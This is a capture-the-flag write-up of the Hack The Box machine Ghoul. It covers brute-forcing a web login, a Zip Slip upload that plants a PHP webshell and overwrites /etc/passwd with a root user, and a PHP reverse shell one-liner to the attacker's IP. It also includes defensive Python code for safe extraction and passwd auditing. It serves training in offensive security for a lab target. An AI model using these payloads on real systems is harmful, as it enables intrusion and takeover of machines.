Hack The Box - Ghoul

Quick Summary

Hey guys, today Ghoul retired and here's my write-up about it. It was a very hard box with a lot of rabbit holes, tons of enumeration and a lot of pivoting. However, I enjoyed most parts of the box and learned some new stuff. It's a Linux box and its IP is 10.10.10.101; I added it to /etc/hosts as ghoul.htb. Let's jump right in!



Nmap

As always we will start with nmap to scan for open ports and services:


root@kali:~/Desktop/HTB/boxes/ghoul# nmap -sV -sT -sC -o nmapinitial ghoul.htb

Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-04 12:47 EET

Nmap scan report for ghoul.htb (10.10.10.101)

Host is up (0.22s latency).

Not shown: 996 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 c1:1c:4b:0c:c6:de:ae:99:49:15:9e:f9:bc:80:d2:3f (RSA)

|_ 256 a8:21:59:7d:4c:e7:97:ad:78:51:da:e5:f0:f9:ab:7d (ECDSA)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

|_http-server-header: Apache/2.4.29 (Ubuntu)

|_http-title: Aogiri Tree

2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 63:59:8b:4f:8d:0a:e1:15:44:14:57:27:e7:af:fb:3b (RSA)

| 256 8c:8b:a0:a8:85:10:3d:27:07:51:29:ad:9b:ec:57:e3 (ECDSA)

|_ 256 9a:f5:31:4b:80:11:89:26:59:61:95:ff:5c:68:bc:a7 (ED25519)

8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1

| http-auth:

| HTTP/1.1 401 Unauthorized\x0D

|_ Basic realm=Aogiri

|_http-server-header: Apache-Coyote/1.1

|_http-title: Apache Tomcat/7.0.88 - Error report

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 39.96 seconds



We got two SSH ports (22 and 2222) and two HTTP ports (80 and 8080). Let's check the first HTTP port.

Initial Web Enumeration

By going to http://ghoul.htb we see a basic static website with nothing really interesting:



So I ran gobuster with the extensions php and html:


root@kali:~/Desktop/HTB/boxes/ghoul# gobuster -u http://ghoul.htb/ -w /usr/share/wordlists/dirb/common.txt -x php,html



=====================================================

Gobuster v2.0.1 OJ Reeves (@TheColonial)

=====================================================

[+] Mode : dir

[+] Url/Domain : http://ghoul.htb/

[+] Threads : 10

[+] Wordlist : /usr/share/wordlists/dirb/common.txt

[+] Status codes : 200,204,301,302,307,403

[+] Extensions : php,html

[+] Timeout : 10s

=====================================================

2019/10/04 12:53:49 Starting gobuster

=====================================================

/.hta (Status: 403)

/.hta.php (Status: 403)

/.hta.html (Status: 403)

/.htaccess (Status: 403)

/.htaccess.php (Status: 403)

/.htaccess.html (Status: 403)

/.htpasswd (Status: 403)

/.htpasswd.php (Status: 403)

/.htpasswd.html (Status: 403)

/archives (Status: 301)

/blog.html (Status: 200)

/contact.html (Status: 200)

/css (Status: 301)

/images (Status: 301)

/index.html (Status: 200)

/index.html (Status: 200)

/js (Status: 301)

/secret.php (Status: 200)

/server-status (Status: 403)

/uploads (Status: 301)

/users (Status: 301)



/secret.php and /users look interesting.

/secret.php:



Of course this user flag was just a troll, but there are two interesting things here. The first is Noro asking Kaneki for access and Kaneki replying with ILoveTouka, which looks like a password. The other is the fake art site Kaneki talked about, which is probably the site running on port 8080.

/users:



ILoveTouka didn't work as a password, so I tried to brute-force the password for the username admin and got it (abcdef):


root@kali:~/Desktop/HTB/boxes/ghoul# wfuzz --hh 1073 -c -u http://ghoul.htb/users/login.php -X POST -d "Username=admin&Password=FUZZ&Submit=Login" -w ./darkweb2017-top10000.txt



Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.



********************************************************

* Wfuzz 2.3.4 - The Web Fuzzer *

********************************************************



Target: http://ghoul.htb/users/login.php

Total requests: 10000



==================================================================

ID Response Lines Word Chars Payload

==================================================================



000242: C=302 0 L 0 W 0 Ch "abcdef"

000311: C=200 37 L 81 W 1073 Ch "12345qwert"^C

Finishing pending requests...



However, this was just another troll:





I couldn't find anything else on port 80, so I checked port 8080. It had basic HTTP authentication:



But it was easily guessable (admin : admin):





This is the fake art website Kaneki was talking about, and we can upload images. But we can also upload zip archives:



Arbitrary File Write (Zip Slip) –> RCE

The ability to upload zip archives can lead to a vulnerability known as Zip Slip. It happens when an archive contains entries whose names include directory traversal sequences (../). If the extraction code simply joins the entry name onto the destination directory without checking that the result still lies inside it, the extracted file is written to whatever path the name points at, anywhere the extracting process is allowed to write.

We need to put a shell in /var/www/html, so I copied simple-backdoor.php to /var/www/html and then added it to a zip archive using a lot of ../ before the file path:


root@kali:~/Desktop/HTB/boxes/ghoul# cd /var/www/html/

root@kali:/var/www/html# cp /usr/share/webshells/php/simple-backdoor.php ./shell.php

root@kali:/var/www/html# zip shell.zip ../../../../../../../../../../var/www/html/shell.php

adding: ../../../../../../../../../../var/www/html/shell.php (deflated 35%)

root@kali:/var/www/html# cd -

/root/Desktop/HTB/boxes/ghoul

root@kali:~/Desktop/HTB/boxes/ghoul# mv /var/www/html/shell.zip .

root@kali:~/Desktop/HTB/boxes/ghoul#



This is the easiest way to do it. If you open the archive with vi you'll see the stored file name:



When this zip is extracted on the machine it will write shell.php to /var/www/html.
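As an added example (not code from the write-up or the box), here is how an upload handler should treat such an archive: a constructed zip with one benign entry and one traversal entry like the one above, the path a naive extractor would write to, and a hardened extractor that rejects anything resolving outside the destination. The destination directory /opt/app/uploads is an assumption.

```python
"""Zip Slip: finding traversal entries and extracting safely.

Added example for this write-up, not code from the box or the author.
The archive is constructed in memory; the traversal entry name mirrors the
one built with `zip` above, but its content is a harmless placeholder.
"""
from __future__ import annotations

import io
import os
import tempfile
import zipfile

# Constructed entry name: ten "../" then the path the write-up wanted to reach.
TRAVERSAL_NAME = "../../../../../../../../../../var/www/html/shell.php"


def build_sample_zip() -> bytes:
    """Constructed sample archive: one normal file and one traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("gallery/cat.jpg", b"\xff\xd8\xff\xe0 not a real jpeg")
        # zipfile does not sanitise names on write, so the ../ survives.
        zf.writestr(TRAVERSAL_NAME, b"placeholder, not a webshell")
    return buf.getvalue()


def naive_target(dest_dir: str, name: str) -> str:
    """Where an extractor that just joins dest_dir + name would write."""
    return os.path.normpath(os.path.join(dest_dir, name))


def entry_is_safe(dest_dir: str, name: str) -> bool:
    """True only if `name` resolves to a location inside dest_dir.

    realpath() collapses ../ and follows symlinks so the comparison is made
    on the final location; the prefix test appends os.sep so that /tmp/out2
    is not mistaken for something inside /tmp/out.
    """
    if not name or "\x00" in name or "\\" in name or name.startswith("/"):
        return False
    base = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(base, name))
    return target == base or target.startswith(base + os.sep)


def find_unsafe_entries(zip_bytes: bytes, dest_dir: str) -> list[str]:
    """Pre-extraction check for an upload handler: names that would escape."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [i.filename for i in zf.infolist()
                if not entry_is_safe(dest_dir, i.filename)]


def safe_extract(zip_bytes: bytes, dest_dir: str) -> tuple[list[str], list[str]]:
    """Extract only entries that stay inside dest_dir. Returns (written, rejected)."""
    written: list[str] = []
    rejected: list[str] = []
    base = os.path.realpath(dest_dir)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not entry_is_safe(base, info.filename):
                rejected.append(info.filename)
                continue
            target = os.path.join(base, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written, rejected


def demo() -> dict:
    """Run both checks on the sample archive against a throwaway directory."""
    data = build_sample_zip()
    with tempfile.TemporaryDirectory() as dest:
        written, rejected = safe_extract(data, dest)
        landed = os.path.isfile(os.path.join(dest, "gallery", "cat.jpg"))
    return {
        "naive_target": naive_target("/opt/app/uploads", TRAVERSAL_NAME),
        "flagged": find_unsafe_entries(data, "/opt/app/uploads"),
        "written": written,
        "rejected": rejected,
        "benign_landed": landed,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Python's own ZipFile.extract() already strips ".." components, but many extraction libraries in other languages do not, which is why the check is written out explicitly rather than relied on implicitly.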





The shell was successfully uploaded:



Now we can simply get a reverse shell. The usual nc shell didn't work because nc wasn't installed on the box, so I used PHP instead:


php -r '$sock=fsockopen("10.10.xx.xx",1337);exec("/bin/sh -i <&3 >&3 2>&3");'







Privilege Escalation on Aogiri, User Flag

First thing I did after getting a shell was to upgrade it to a stable, fully interactive one:


$ which python

/usr/bin/python

$ python -c "import pty;pty.spawn('/bin/bash')"

www-data@Aogiri:/var/www/html$ ^Z

[1]+ Stopped nc -lvnp 1337

root@kali:~/Desktop/HTB/boxes/ghoul# stty raw -echo

root@kali:~/Desktop/HTB/boxes/ghoul# nc -lvnp 1337



www-data@Aogiri:/var/www/html$ export TERM=screen

www-data@Aogiri:/var/www/html$



Then I checked /home; www-data couldn't access any of the directories:


www-data@Aogiri:/var/www/html$ cd /home/

www-data@Aogiri:/home$ ls -la

total 36

drwxr-xr-x 1 root root 4096 Dec 13 2018 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

drwx------ 1 Eto Eto 4096 Dec 13 2018 Eto

drwx------ 1 kaneki kaneki 4096 Dec 13 2018 kaneki

drwx------ 1 noro noro 4096 Dec 13 2018 noro

www-data@Aogiri:/home$ cd Eto/

bash: cd: Eto/: Permission denied

www-data@Aogiri:/home$ cd kaneki/

bash: cd: kaneki/: Permission denied

www-data@Aogiri:/home$ cd noro/

bash: cd: noro/: Permission denied

www-data@Aogiri:/home$ cd -

/var/www/html

www-data@Aogiri:/var/www/html$



So I had to escalate. Looking at the shell I uploaded, I saw that it was owned by root, which means the archive is extracted by a root process and the same zip trick can write files anywhere on the box:


www-data@Aogiri:/var/www/html$ ls -la

total 352

drwxr-xr-x 1 root root 4096 Oct 4 11:17 .

drwxr-xr-x 1 root root 4096 Jan 22 2019 ..

drwxr-xr-x 1 root root 4096 Dec 13 2018 archives

-r-xr-xr-x 1 root root 10723 Dec 13 2018 blog.html

-r-xr-xr-x 1 root root 8977 Dec 13 2018 contact.html

dr-xr-xr-x 1 root root 4096 Dec 13 2018 css

-r-xr-xr-x 1 root root 37906 Dec 13 2018 eto.jpg

dr-xr-xr-x 1 root root 4096 Dec 13 2018 images

-r-xr-xr-x 1 root root 11000 Dec 13 2018 index.html

dr-xr-xr-x 1 root root 4096 Dec 13 2018 js

-r-xr-xr-x 1 root root 13721 Dec 13 2018 kaneki-ken.jpg

-rw-r--r-- 1 root root 239 Dec 13 2018 kaneki.html

-r-xr-xr-x 1 root root 112642 Dec 13 2018 kaneki.jpg

-r-xr-xr-x 1 root root 134 Dec 13 2018 kaneki.php

-r-xr-xr-x 1 root root 13721 Dec 13 2018 ken.jpg

dr-xr-xr-x 1 root root 4096 Dec 13 2018 less

-r-xr-xr-x 1 root root 18457 Dec 13 2018 noro.jpg

-r-xr-xr-x 1 root root 4865 Dec 13 2018 secret.php

-rw-r--r-- 1 root root 328 Oct 4 11:17 shell.php

-r-xr-xr-x 1 root root 18159 Dec 13 2018 tatara.jpg

dr-xr-xr-x 1 root root 4096 Dec 13 2018 uploads

dr-xr-xr-x 1 root root 4096 Dec 13 2018 users

www-data@Aogiri:/var/www/html$



So I used the zip exploit again to overwrite /etc/passwd, but first I had to build the new passwd file. I copied the one from the box:


www-data@Aogiri:/var/www/html$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin

systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

messagebus:x:103:104::/nonexistent:/usr/sbin/nologin

sshd:x:104:65534::/run/sshd:/usr/sbin/nologin

kaneki:x:1000:1000::/home/kaneki:/bin/bash

Eto:x:1001:1001::/home/Eto:/bin/bash

noro:x:1002:1002::/home/noro:/bin/bash

www-data@Aogiri:/var/www/html$



I used openssl to generate the hash of the password (AAAA):


root@kali:~/Desktop/HTB/boxes/ghoul# openssl passwd AAAA

gDlPrjU6SWeKo



Then I added a new user called rooot with UID 0 to the passwd file:


root@kali:~/Desktop/HTB/boxes/ghoul# echo "rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash" >> passwd

root@kali:~/Desktop/HTB/boxes/ghoul# cat passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin

systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

messagebus:x:103:104::/nonexistent:/usr/sbin/nologin

sshd:x:104:65534::/run/sshd:/usr/sbin/nologin

kaneki:x:1000:1000::/home/kaneki:/bin/bash

Eto:x:1001:1001::/home/Eto:/bin/bash

noro:x:1002:1002::/home/noro:/bin/bash

rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash

root@kali:~/Desktop/HTB/boxes/ghoul#



After that I created the zip file like I did before (temporarily swapping in my own /etc/passwd so the stored entry name is exactly ../../../../../../../../etc/passwd):


root@kali:~/Desktop/HTB/boxes/ghoul# cd /etc/

root@kali:/etc# mv passwd passwd.1

root@kali:/etc# cp ~/Desktop/HTB/boxes/ghoul/passwd .

root@kali:/etc# cd -

/root/Desktop/HTB/boxes/ghoul

root@kali:~/Desktop/HTB/boxes/ghoul# zip passwd.zip ../../../../../../../../etc/passwd

adding: ../../../../../../../../etc/passwd (deflated 62%)

root@kali:~/Desktop/HTB/boxes/ghoul# rm /etc/passwd

root@kali:~/Desktop/HTB/boxes/ghoul# mv /etc/passwd.1 /etc/passwd

root@kali:~/Desktop/HTB/boxes/ghoul#



Then I uploaded it:



Now we can do su rooot with AAAA as the password:


www-data@Aogiri:/var/www/html$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/bin/sh

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin

systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin

messagebus:x:103:104::/nonexistent:/usr/sbin/nologin

sshd:x:104:65534::/run/sshd:/usr/sbin/nologin

kaneki:x:1000:1000::/home/kaneki:/bin/bash

Eto:x:1001:1001::/home/Eto:/bin/bash

noro:x:1002:1002::/home/noro:/bin/bash

rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash

www-data@Aogiri:/var/www/html$ su rooot

Password:

root@Aogiri:/var/www/html# id

uid=0(root) gid=0(root) groups=0(root)

root@Aogiri:/var/www/html#



And I could get the user flag from /home/kaneki:



We owned user.
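The /etc/passwd tampering above leaves clear traces. As an added example (not part of the write-up), here is a small audit that parses passwd content, flags extra UID-0 accounts, password hashes stored in passwd instead of shadow, and legacy DES hashes, and diffs the file against a known-good baseline. The sample content is constructed from the listings on this page, trimmed to the relevant lines.

```python
"""Audit /etc/passwd for the tampering shown above.

Added example, not the write-up's own code. Sample input is constructed
from the page's listings and trimmed to the lines that matter.
"""
from __future__ import annotations

from dataclasses import dataclass

CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/sh
kaneki:x:1000:1000::/home/kaneki:/bin/bash
Eto:x:1001:1001::/home/Eto:/bin/bash
noro:x:1002:1002::/home/noro:/bin/bash
"""
# The line the write-up appended through the zip upload.
TAMPERED_PASSWD = CLEAN_PASSWD + "rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash\n"

EXTRA_UID0 = "UID 0 account other than root"
HASH_IN_PASSWD = "password hash stored directly in /etc/passwd"
DES_HASH = "legacy DES crypt hash (13 chars, no $id$ prefix)"
EMPTY_PASSWORD = "empty password field"
DUPLICATE_UID = "UID shared with another account"
MALFORMED = "malformed line"


@dataclass(frozen=True)
class Finding:
    user: str
    reason: str


def audit_passwd(text: str) -> list[Finding]:
    """Return one Finding per suspicious property of each passwd entry."""
    findings: list[Finding] = []
    owner_of_uid: dict[int, str] = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append(Finding(f"line {lineno}", MALFORMED))
            continue
        name, pw, uid = fields[0], fields[1], int(fields[2])
        if uid == 0 and name != "root":
            findings.append(Finding(name, EXTRA_UID0))
        elif uid in owner_of_uid:
            findings.append(Finding(name, DUPLICATE_UID))
        owner_of_uid.setdefault(uid, name)
        # "x" means the hash lives in /etc/shadow; "*", "!" and "!!" are locked.
        if pw == "":
            findings.append(Finding(name, EMPTY_PASSWORD))
        elif pw not in ("x", "*", "!", "!!"):
            findings.append(Finding(name, HASH_IN_PASSWD))
            if len(pw) == 13 and "$" not in pw:
                findings.append(Finding(name, DES_HASH))
    return findings


def added_entries(baseline: str, current: str) -> list[str]:
    """Usernames present in `current` but not in `baseline`: what a file
    integrity monitor comparing against a known-good copy would report."""
    def names(text: str) -> set[str]:
        return {row.split(":")[0] for row in text.splitlines()
                if row.strip() and not row.startswith("#")}
    return sorted(names(current) - names(baseline))


if __name__ == "__main__":
    for f in audit_passwd(TAMPERED_PASSWD):
        print(f"{f.user}: {f.reason}")
    print("added:", added_entries(CLEAN_PASSWD, TAMPERED_PASSWD))
```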

Enumeration, Pivoting from Aogiri to kaneki-pc

After getting root I couldn't find the root flag:


root@Aogiri:/home/kaneki# cd /root/

root@Aogiri:~# ls -la

total 48

drwx------ 1 root root 4096 Apr 28 14:17 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rw-r--r-- 1 root root 3106 Dec 13 2018 .bashrc

drwx------ 1 root root 4096 Dec 13 2018 .cache

-rw-r--r-- 1 root root 148 Dec 13 2018 .profile

-rw-r--r-- 1 root root 0 Jan 22 2019 .selected_editor

drw------- 1 root root 4096 Dec 13 2018 .ssh

-rw------- 1 root root 12094 Apr 28 14:17 .viminfo

root@Aogiri:~#



So I started to enumerate the home directories, web and configuration files.

Every user had some notes (hints) in their home directory:

Eto:


root@Aogiri:/home/Eto# ls -al

total 40

drwx------ 1 Eto Eto 4096 Dec 13 2018 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rwx------ 1 Eto Eto 220 Dec 13 2018 .bash_logout

-rwx------ 1 Eto Eto 3771 Dec 13 2018 .bashrc

-rwx------ 1 Eto Eto 807 Dec 13 2018 .profile

drwx------ 1 Eto Eto 4096 Dec 13 2018 .ssh

-rwx------ 1 Eto Eto 92 Dec 13 2018 alert.txt

root@Aogiri:/home/Eto# cat alert.txt

Hey Noro be sure to keep checking the humans for IP logs and chase those little shits down!

root@Aogiri:/home/Eto#



kaneki:


root@Aogiri:/home/kaneki# ls -al

total 92

drwx------ 1 kaneki kaneki 4096 Dec 13 2018 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rwx------ 1 kaneki kaneki 220 Dec 13 2018 .bash_logout

-rwx------ 1 kaneki kaneki 3771 Dec 13 2018 .bashrc

-rwx------ 1 kaneki kaneki 807 Dec 13 2018 .profile

drwx------ 1 kaneki kaneki 4096 Dec 13 2018 .ssh

-rw------- 1 kaneki kaneki 1802 Dec 13 2018 .viminfo

-rw------- 1 kaneki kaneki 148 Dec 13 2018 note.txt

-rwx------ 1 kaneki kaneki 136 Dec 13 2018 notes

-rwx------ 1 kaneki kaneki 39382 Dec 13 2018 secret.jpg

-rwx------ 1 kaneki kaneki 33 Dec 13 2018 user.txt

root@Aogiri:/home/kaneki# cat note.txt

Vulnerability in Gogs was detected. I shutdown the registration function on our server, please ensure that no one gets access to the test accounts.

root@Aogiri:/home/kaneki# cat notes

I've set up file server into the server's network ,Eto if you need to transfer files to the server can use my pc.

DM me for the access.

root@Aogiri:/home/kaneki#



noro:


root@Aogiri:/home# cd noro/

root@Aogiri:/home/noro# ls -al

total 40

drwx------ 1 noro noro 4096 Dec 13 2018 .

drwxr-xr-x 1 root root 4096 Dec 13 2018 ..

lrwxrwxrwx 1 root root 9 Dec 29 2018 .bash_history -> /dev/null

-rwx------ 1 noro noro 220 Dec 13 2018 .bash_logout

-rwx------ 1 noro noro 3771 Dec 13 2018 .bashrc

-rwx------ 1 noro noro 807 Dec 13 2018 .profile

drwx------ 1 noro noro 4096 Dec 13 2018 .ssh

-rwx------ 1 noro noro 24 Dec 13 2018 to-do.txt

root@Aogiri:/home/noro# cat to-do.txt

Need to update backups.

root@Aogiri:/home/noro#



I could also get the SSH material for the 3 users:


root@Aogiri:/home/Eto/.ssh# ls -al

total 28

drwx------ 1 Eto Eto 4096 Dec 13 2018 .

drwx------ 1 Eto Eto 4096 Dec 13 2018 ..

-rwx------ 1 Eto Eto 392 Dec 13 2018 authorized_keys

-rwx------ 1 Eto Eto 1675 Dec 13 2018 id_rsa

-rwx------ 1 Eto Eto 392 Dec 13 2018 id_rsa.pub

root@Aogiri:/home/Eto/.ssh# cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDzKoGE8Z9QDJDlC52zJFtQHHvZGxXgLi8fnYCOCi6GvuDV+ZNt3krFCwbkn02HAExvj1J9GXkPbZGNwMlYOYNZPqVOT7RRJML9yQNKxl4FW2IX4R23DPN17i/vjF4Gyjkk05H+P4QXsk34KZ71SOT+KMGTJ2tpV+VUKAl6jlMJM5ahDAPgrA6k2DOLk+oRF4c7Riwc2xz3/PNI/EJR8MMK5tP8bp6NUPt2AtCLO495dBFeGX6I164G5csjxxJKx5mzgjJsv5BL0l4H0RvLobDoXF++Lm3r580R6dVFsSlkC7TLJ8oscreVs6cfanQwc0E7zs61dipl5q9ceW1XWK/J Eto@Aogiri

root@Aogiri:/home/Eto/.ssh# cd ../../kaneki/.ssh/

root@Aogiri:/home/kaneki/.ssh# ls -la

total 28

drwx------ 1 kaneki kaneki 4096 Dec 13 2018 .

drwx------ 1 kaneki kaneki 4096 Dec 13 2018 ..

-rwx------ 1 kaneki kaneki 797 Dec 13 2018 authorized_keys

-rwx------ 1 kaneki kaneki 1766 Dec 13 2018 id_rsa

-rwx------ 1 kaneki kaneki 395 Dec 13 2018 id_rsa.pub

root@Aogiri:/home/kaneki/.ssh# cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhK6T0d7TXpXNf2anZ/02E0NRVKuSWVslhHaJjUYtdtBVxCJg+wv1oFGPij9hgefdmFIKbvjElSr+rMrQpfCn6v7GmaP2QOjaoGPPX0EUPn9swnReRgi7xSKvHzru/ESc9AVIQIaeTypLNT/FmNuyr8P+gFLIq6tpS5eUjMHFyd68SW2shb7GWDM73tOAbTUZnBv+z1fAXv7yg2BVl6rkknHSmyV0kQJw5nQUTm4eKq2AIYTMB76EcHc01FZo9vsebBnD0EW4lejtSI/SRC+YCqqY+L9TZ4cunyYKNOuAJnDXncvQI8zpE+c50k3UGIatnS5f2MyNVn1l1bYDFQgYl kaneki_pub@kaneki-pc

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsiPbWC8feNW7o6emQUk12tFOcucqoS/nnKN/LM3hCtPN8r4by8Ml1IR5DctjeurAmlJtXcn8MqlHCRbR6hZKydDwDzH3mb6M/gCYm4fD9FppbOdG4xMVGODbTTPV/h2Lh3ITRm+xNHYDmWG84rQe++gJImKoREkzsUNqSvQv4rO1RlO6W3rnz1ySPAjZF5sloJ8Rmnk+MK4skfj00Gb2mM0/RNmLC/rhwoUC+Wh0KPkuErg4YlqD8IB7L3N/UaaPjSPrs2EDeTGTTFI9GdcT6LIaS65CkcexWlboQu3DDOM5lfHghHHbGOWX+bh8VHU9JjvfC8hDN74IvBsy120N5 kaneki@Aogiri

root@Aogiri:/home/kaneki/.ssh# cd ../../noro/.ssh/

root@Aogiri:/home/noro/.ssh# ls -al

total 28

drwx------ 1 noro noro 4096 Dec 13 2018 .

drwx------ 1 noro noro 4096 Dec 13 2018 ..

-rwx------ 1 noro noro 393 Dec 13 2018 authorized_keys

-rwx------ 1 noro noro 1675 Dec 13 2018 id_rsa

-rwx------ 1 noro noro 393 Dec 13 2018 id_rsa.pub

root@Aogiri:/home/noro/.ssh# cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAIchqQ1i+uOQ4jckHbO8sdtks3Cm6Ygie9youcFvqH6rBSxqWdQn8PdQ/HgrXN+RvED28aRC0kkzACL79gx9RGS4/kxqZBlPyP9mu7BWmC1J0NLACws0mvinztpixUaNj2w4WaBBe2+MpfeRoo9Abk4sBcZC7De6ZZl6RRqrdsb1kTZSWMXyxIOJMZrc+3dAc5+faujSkyeVbudjSlLf3g8xis/uSE3OvGhF4ypYDGDSRYbLY8oScDNU0eQexGMXYcY10z5f69hnrvaZ8wkvTKXwqHoMpgtjBz5NxewnY6UqhdMn0LkEeZdtK6UPRHdfSwoxjOgSyjaEmhU013d+p noro@Aogiri

root@Aogiri:/home/noro/.ssh#



In kaneki's authorized_keys there was a public key for kaneki_pub@kaneki-pc; with that and the hints about kaneki's PC and the file server, it was obvious that we needed to pivot to another host. But before that, I found some passwords in /var/www/html/users/login.php:

<?php

session_start();

if (isset($_POST['Submit'])) {
    // Credentials are hardcoded in the login page itself
    $logins = array('kaneki' => '123456', 'noro' => 'password123', 'admin' => 'abcdef');

    $Username = isset($_POST['Username']) ? $_POST['Username'] : '';
    $Password = isset($_POST['Password']) ? $_POST['Password'] : '';

    if (isset($logins[$Username]) && $logins[$Username] == $Password) {
        $_SESSION['UserData']['Username'] = $logins[$Username];
        header("location:index.php");
        exit;
    } else {
        $msg = "<span style='color:red'>Invalid Login Details</span>";
    }
}





And in /usr/share/tomcat7/conf/tomcat-users.xml:

